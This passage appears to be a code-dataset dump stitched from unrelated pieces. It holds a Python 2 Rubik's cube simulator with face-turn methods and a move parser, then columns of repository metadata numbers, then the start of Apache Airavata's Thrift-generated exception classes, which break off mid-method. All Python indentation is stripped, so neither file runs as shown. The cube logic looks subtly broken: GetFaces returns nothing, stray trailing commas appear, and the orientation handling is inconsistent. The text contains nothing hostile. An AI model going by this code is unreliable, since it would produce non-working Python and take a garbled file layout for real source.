DOWN=5
class Piece(object):
def __init__(self, faces):
self.faces = faces
self.orientation = Orientation.FRONT
self.orientation2 = Orientation.UP
def GetOrientation(self):
return self.orientation
def SetOrientation(self, o):
self.orientation = o
def GetOrientation2(self):
return self.orientation2
def SetOrientation2(self, o):
self.orientation2 = o
def GetFaces(self):
self.faces
def FrontFace(self):
return self.faces[int(self.orientation)]
def __str__(self):
return str(self.faces) + str(",") + str(self.orientation)
class Cube(object):
def __init__(self, faceColours):
self.pieces = []
for i in range(0,3):
self.pieces.append([])
for j in range(0,3):
self.pieces[i].append([])
self.pieces[0][0].append(Piece(str(faceColours[Orientation.UP]) + str(faceColours[Orientation.LEFT]) + str(faceColours[Orientation.FRONT]) + str("-") + str("-") + str("-")))
self.pieces[0][0].append(Piece(str(faceColours[Orientation.UP]) + str(faceColours[Orientation.LEFT]) + str("-") + str("-") + str("-") + str("-")))
self.pieces[0][0].append(Piece(str(faceColours[Orientation.UP]) + str(faceColours[Orientation.LEFT]) + str("-") + str("-") + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[0][1].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str(faceColours[Orientation.FRONT]) + str("-") + str("-") + str("-")))
self.pieces[0][1].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str("-") + str("-") + str("-") + str("-")))
self.pieces[0][1].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str("-") + str("-") + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[0][2].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.RIGHT]) + str("-") + str("-")))
self.pieces[0][2].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str("-") + str("-")))
self.pieces[0][2].append(Piece(str(faceColours[Orientation.UP]) + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[1][0].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.LEFT]) + str("-") + str("-")))
self.pieces[1][0].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.LEFT]) + str("-") + str("-")))
self.pieces[1][0].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.LEFT]) + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[1][1].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str("-") + str("-") + str("-")))
self.pieces[1][1].append(Piece(str("-") + str("-") + str("-") + str("-") + str("-") + str("-")))
self.pieces[1][1].append(Piece(str("-") + str("-") + str("-") + str("-") + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[1][2].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.RIGHT]) + str("-") + str("-")))
self.pieces[1][2].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str("-") + str("-")))
self.pieces[1][2].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str(faceColours[Orientation.BACK]) + str("-")))
self.pieces[2][0].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.LEFT]) + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][0].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.LEFT]) + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][0].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.LEFT]) + str(faceColours[Orientation.BACK]) + str(faceColours[Orientation.DOWN])))
self.pieces[2][1].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str("-") + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][1].append(Piece(str("-") + str("-") + str("-") + str("-") + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][1].append(Piece(str("-") + str("-") + str("-") + str("-") + str(faceColours[Orientation.BACK]) + str(faceColours[Orientation.DOWN])))
self.pieces[2][2].append(Piece(str("-") + str("-") + str(faceColours[Orientation.FRONT]) + str(faceColours[Orientation.RIGHT]) + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][2].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str("-") + str(faceColours[Orientation.DOWN])))
self.pieces[2][2].append(Piece(str("-") + str("-") + str("-") + str(faceColours[Orientation.RIGHT]) + str(faceColours[Orientation.BACK]) + str(faceColours[Orientation.DOWN])))
def U(self, num):
for i in range (0,num):
temp = self.pieces[0][0][0]
self.pieces[0][0][0] = self.pieces[0][2][0]
self.pieces[0][2][0] = self.pieces[0][2][2]
self.pieces[0][2][2] = self.pieces[0][0][2]
self.pieces[0][0][2] = temp
temp = self.pieces[0][0][1]
self.pieces[0][0][1] = self.pieces[0][1][0]
self.pieces[0][1][0] = self.pieces[0][2][1]
self.pieces[0][2][1] = self.pieces[0][1][2]
self.pieces[0][1][2] = temp
for i in range(0,3):
for j in range(0,3):
if self.pieces[0][i][j].GetOrientation() == Orientation.UP:
self.pieces[0][i][j].SetOrientation(Orientation.RIGHT)
elif self.pieces[0][i][j].GetOrientation() == Orientation.LEFT:
self.pieces[0][i][j].SetOrientation(Orientation.FRONT)
elif self.pieces[0][i][j].GetOrientation() == Orientation.FRONT:
self.pieces[0][i][j].SetOrientation(Orientation.RIGHT)
elif self.pieces[0][i][j].GetOrientation() == Orientation.RIGHT:
self.pieces[0][i][j].SetOrientation(Orientation.BACK)
elif self.pieces[0][i][j].GetOrientation() == Orientation.BACK:
self.pieces[0][i][j].SetOrientation(Orientation.LEFT)
elif self.pieces[0][i][j].GetOrientation() == Orientation.DOWN:
self.pieces[0][i][j].SetOrientation(Orientation.RIGHT)
def L(self, num):
for i in range (0,num):
temp = self.pieces[2][0][2]
self.pieces[2][0][2] = self.pieces[2][0][0]
self.pieces[2][0][0] = self.pieces[0][0][0]
self.pieces[0][0][0] = self.pieces[0][0][2]
self.pieces[0][0][2] = temp
temp = self.pieces[1][0][2]
self.pieces[1][0][2] = self.pieces[2][0][1]
self.pieces[2][0][1] = self.pieces[1][0][0]
self.pieces[1][0][0] = self.pieces[0][0][1]
self.pieces[0][0][1] = temp
for i in range(0,3):
for j in range(0,3):
if self.pieces[i][0][j].GetOrientation() == Orientation.UP:
self.pieces[i][0][j].SetOrientation(Orientation.BACK)
elif self.pieces[i][0][j].GetOrientation() == Orientation.LEFT:
self.pieces[i][0][j].SetOrientation(Orientation.UP)
elif self.pieces[i][0][j].GetOrientation() == Orientation.FRONT:
self.pieces[i][0][j].SetOrientation(Orientation.UP)
elif self.pieces[i][0][j].GetOrientation() == Orientation.RIGHT:
self.pieces[i][0][j].SetOrientation(Orientation.UP)
elif self.pieces[i][0][j].GetOrientation() == Orientation.BACK:
self.pieces[i][0][j].SetOrientation(Orientation.DOWN)
elif self.pieces[i][0][j].GetOrientation() == Orientation.DOWN:
self.pieces[i][0][j].SetOrientation(Orientation.FRONT),
def F(self, num):
for i in range (0,num):
temp = self.pieces[0][0][0]
self.pieces[0][0][0] = self.pieces[2][0][0]
self.pieces[2][0][0] = self.pieces[2][2][0]
self.pieces[2][2][0] = self.pieces[0][2][0]
self.pieces[0][2][0] = temp
temp = self.pieces[1][0][0]
self.pieces[1][0][0] = self.pieces[2][1][0]
self.pieces[2][1][0] = self.pieces[1][2][0]
self.pieces[1][2][0] = self.pieces[0][1][0]
self.pieces[0][1][0] = temp
def R(self, num):
for i in range (0,num):
temp = self.pieces[0][2][0]
self.pieces[0][2][0] = self.pieces[2][2][0]
self.pieces[2][2][0] = self.pieces[2][2][2]
self.pieces[2][2][2] = self.pieces[0][2][2]
self.pieces[0][2][2] = temp
temp = self.pieces[1][2][0]
self.pieces[1][2][0] = self.pieces[2][2][1]
self.pieces[2][2][1] = self.pieces[1][2][2]
self.pieces[1][2][2] = self.pieces[0][2][1]
self.pieces[0][2][1] = temp
for i in range(0,3):
for j in range(0,3):
if self.pieces[i][2][j].GetOrientation() == Orientation.UP:
self.pieces[i][2][j].SetOrientation(Orientation.FRONT)
elif self.pieces[i][2][j].GetOrientation() == Orientation.LEFT:
self.pieces[i][2][j].SetOrientation(Orientation.DOWN)
elif self.pieces[i][2][j].GetOrientation() == Orientation.FRONT:
self.pieces[i][2][j].SetOrientation(Orientation.DOWN)
elif self.pieces[i][2][j].GetOrientation() == Orientation.RIGHT:
self.pieces[i][2][j].SetOrientation(Orientation.DOWN)
elif self.pieces[i][2][j].GetOrientation() == Orientation.BACK:
self.pieces[i][2][j].SetOrientation(Orientation.UP)
elif self.pieces[i][2][j].GetOrientation() == Orientation.DOWN:
self.pieces[i][2][j].SetOrientation(Orientation.BACK),
def B(self, num):
for i in range (0,num):
temp = self.pieces[0][2][2]
self.pieces[0][2][2] = self.pieces[2][2][2]
self.pieces[2][2][2] = self.pieces[2][0][2]
self.pieces[2][0][2] = self.pieces[0][0][2]
self.pieces[0][0][2] = temp
temp = self.pieces[1][2][2]
self.pieces[1][2][2] = self.pieces[2][1][2]
self.pieces[2][1][2] = self.pieces[1][0][2]
self.pieces[1][0][2] = self.pieces[0][1][2]
self.pieces[0][1][2] = temp
def D(self, num):
for i in range (0,num):
temp = self.pieces[2][0][0]
self.pieces[2][0][0] = self.pieces[2][0][2]
self.pieces[2][0][2] = self.pieces[2][2][2]
self.pieces[2][2][2] = self.pieces[2][2][0]
self.pieces[2][2][0] = temp
temp = self.pieces[2][0][1]
self.pieces[2][0][1] = self.pieces[2][1][2]
self.pieces[2][1][2] = self.pieces[2][2][1]
self.pieces[2][2][1] = self.pieces[2][1][0]
self.pieces[2][1][0] = temp
for i in range(0,3):
for j in range(0,3):
if self.pieces[2][i][j].GetOrientation() == Orientation.UP:
self.pieces[2][i][j].SetOrientation(Orientation.LEFT)
elif self.pieces[2][i][j].GetOrientation() == Orientation.LEFT:
self.pieces[2][i][j].SetOrientation(Orientation.FRONT)
elif self.pieces[2][i][j].GetOrientation() == Orientation.FRONT:
self.pieces[2][i][j].SetOrientation(Orientation.RIGHT)
elif self.pieces[2][i][j].GetOrientation() == Orientation.RIGHT:
self.pieces[2][i][j].SetOrientation(Orientation.BACK)
elif self.pieces[2][i][j].GetOrientation() == Orientation.BACK:
self.pieces[2][i][j].SetOrientation(Orientation.RIGHT)
elif self.pieces[2][i][j].GetOrientation() == Orientation.DOWN:
self.pieces[2][i][j].SetOrientation(Orientation.RIGHT),
def PrintFront(self):
output = str()
output += self.pieces[0][0][0].FrontFace() + str(" ") + self.pieces[0][1][0].FrontFace() + str(" ") + self.pieces[0][2][0].FrontFace() + str("\n")
output += self.pieces[1][0][0].FrontFace() + str(" ") + self.pieces[1][1][0].FrontFace() + str(" ") + self.pieces[1][2][0].FrontFace() + str("\n")
output += self.pieces[2][0][0].FrontFace() + str(" ") + self.pieces[2][1][0].FrontFace() + str(" ") + self.pieces[2][2][0].FrontFace()
print output
def parse_singmaster(c,input_string):
cur_index = 0
while cur_index < len(input_string):
num_rotations = 1
if(cur_index + 1 < len(input_string) and input_string[cur_index + 1] == '2'):
num_rotations = 2
if(cur_index + 1 < len(input_string) and input_string[cur_index + 1] == "'"):
num_rotations = 3
if input_string[cur_index] == 'F':
c.F(num_rotations)
elif input_string[cur_index] == 'B':
c.B(num_rotations)
elif input_string[cur_index] == 'U':
c.U(num_rotations)
elif input_string[cur_index] == 'D':
c.D(num_rotations)
elif input_string[cur_index] == 'L':
c.L(num_rotations)
elif input_string[cur_index] == 'R':
c.R(num_rotations)
elif input_string[cur_index] == '\'' or input_string[cur_index] == '2' or input_string[cur_index] == '\n':
pass
else:
raise Exception()
cur_index += 1
import sys
#cube_format = sys.stdin.readline()
#moves = sys.stdin.readline()
cube_format = "YRBOGW"
moves = "FL"
c = Cube(cube_format)
parse_singmaster(c, moves)
c.PrintFront()
| 52.356364
| 184
| 0.538894
| 1,853
| 14,398
| 4.156503
| 0.042094
| 0.237601
| 0.091405
| 0.101792
| 0.884316
| 0.876915
| 0.848611
| 0.760971
| 0.651909
| 0.651779
| 0
| 0.043056
| 0.249896
| 14,398
| 275
| 185
| 52.356364
| 0.670093
| 0.004306
| 0
| 0.151111
| 0
| 0
| 0.013812
| 0.003209
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.004444
| 0.004444
| null | null | 0.004444
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f1761f2e844541e9d33f2f0613b0ea8361f1ba8
| 33,048
|
py
|
Python
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/api/error/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 74
|
2015-04-10T02:57:26.000Z
|
2022-02-28T16:10:03.000Z
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/api/error/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 126
|
2015-04-26T02:55:26.000Z
|
2022-02-16T22:43:28.000Z
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/api/error/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 163
|
2015-01-22T14:05:24.000Z
|
2022-03-17T12:24:34.000Z
|
#
# Autogenerated by Thrift Compiler (0.10.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import airavata.model.experiment.ttypes
from thrift.transport import TTransport
class AiravataErrorType(object):
"""
A list of Airavata API Error Message Types
UNKNOWN: No information available about the error
PERMISSION_DENIED: Not permitted to perform action
INTERNAL_ERROR: Unexpected problem with the service
AUTHENTICATION_FAILURE: The client failed to authenticate.
INVALID_AUTHORIZATION: Security Token and/or Username and/or password is incorrect
AUTHORIZATION_EXPIRED: Authentication token expired
UNKNOWN_GATEWAY_ID: The gateway is not registered with Airavata.
UNSUPPORTED_OPERATION: Operation denied because it is currently unsupported.
"""
UNKNOWN = 0
PERMISSION_DENIED = 1
INTERNAL_ERROR = 2
AUTHENTICATION_FAILURE = 3
INVALID_AUTHORIZATION = 4
AUTHORIZATION_EXPIRED = 5
UNKNOWN_GATEWAY_ID = 6
UNSUPPORTED_OPERATION = 7
_VALUES_TO_NAMES = {
0: "UNKNOWN",
1: "PERMISSION_DENIED",
2: "INTERNAL_ERROR",
3: "AUTHENTICATION_FAILURE",
4: "INVALID_AUTHORIZATION",
5: "AUTHORIZATION_EXPIRED",
6: "UNKNOWN_GATEWAY_ID",
7: "UNSUPPORTED_OPERATION",
}
_NAMES_TO_VALUES = {
"UNKNOWN": 0,
"PERMISSION_DENIED": 1,
"INTERNAL_ERROR": 2,
"AUTHENTICATION_FAILURE": 3,
"INVALID_AUTHORIZATION": 4,
"AUTHORIZATION_EXPIRED": 5,
"UNKNOWN_GATEWAY_ID": 6,
"UNSUPPORTED_OPERATION": 7,
}
class ExperimentNotFoundException(TException):
"""
This exception is thrown when a client asks to perform an operation on an experiment that does not exist.
identifier: A description of the experiment that was not found on the server.
key: The value passed from the client in the identifier, which was not found.
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ExperimentNotFoundException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProjectNotFoundException(TException):
"""
1: optional string identifier,
2: optional string key
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProjectNotFoundException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class InvalidRequestException(TException):
"""
This exception is thrown for invalid requests that occur from any reasons like required input parameters are missing,
or a parameter is malformed.
message: contains the associated error message.
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('InvalidRequestException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TimedOutException(TException):
"""
This exception is thrown when RPC timeout gets exceeded.
"""
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TimedOutException')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class AuthenticationException(TException):
"""
This exception is thrown for invalid sshKeyAuthentication requests.
message: contains the cause of the authorization failure.
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AuthenticationException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class AuthorizationException(TException):
"""
This exception is thrown for invalid authorization requests such user does not have acces to an aplication or resource.
message: contains the authorization failure message
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AuthorizationException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class DuplicateEntryException(TException):
"""
This exception is thrown when you try to save a duplicate entity that already exists
in the database.
message: contains the associated error message
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('DuplicateEntryException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class AiravataClientException(TException):
"""
This exception is thrown by Airavata Services when a call fails as a result of
a problem that a client may be able to resolve. For example, if the user
attempts to execute an application on a resource gateway does not have access to.
This exception would not be used for internal system errors that do not
reflect user actions, but rather reflect a problem within the service that
the client cannot resolve.
airavataErrorType: The message type indicating the error that occurred.
must be one of the values of AiravataErrorType.
parameter: If the error applied to a particular input parameter, this will
indicate which parameter.
Attributes:
- airavataErrorType
- parameter
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'airavataErrorType', None, None, ), # 1
(2, TType.STRING, 'parameter', 'UTF8', None, ), # 2
)
def __init__(self, airavataErrorType=None, parameter=None,):
self.airavataErrorType = airavataErrorType
self.parameter = parameter
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.airavataErrorType = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.parameter = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AiravataClientException')
if self.airavataErrorType is not None:
oprot.writeFieldBegin('airavataErrorType', TType.I32, 1)
oprot.writeI32(self.airavataErrorType)
oprot.writeFieldEnd()
if self.parameter is not None:
oprot.writeFieldBegin('parameter', TType.STRING, 2)
oprot.writeString(self.parameter.encode('utf-8') if sys.version_info[0] == 2 else self.parameter)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.airavataErrorType is None:
raise TProtocolException(message='Required field airavataErrorType is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ValidatorResult(object):
"""
Attributes:
- result
- errorDetails
"""
thrift_spec = (
None, # 0
(1, TType.BOOL, 'result', None, None, ), # 1
(2, TType.STRING, 'errorDetails', 'UTF8', None, ), # 2
)
def __init__(self, result=None, errorDetails=None,):
self.result = result
self.errorDetails = errorDetails
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.result = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.errorDetails = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ValidatorResult')
if self.result is not None:
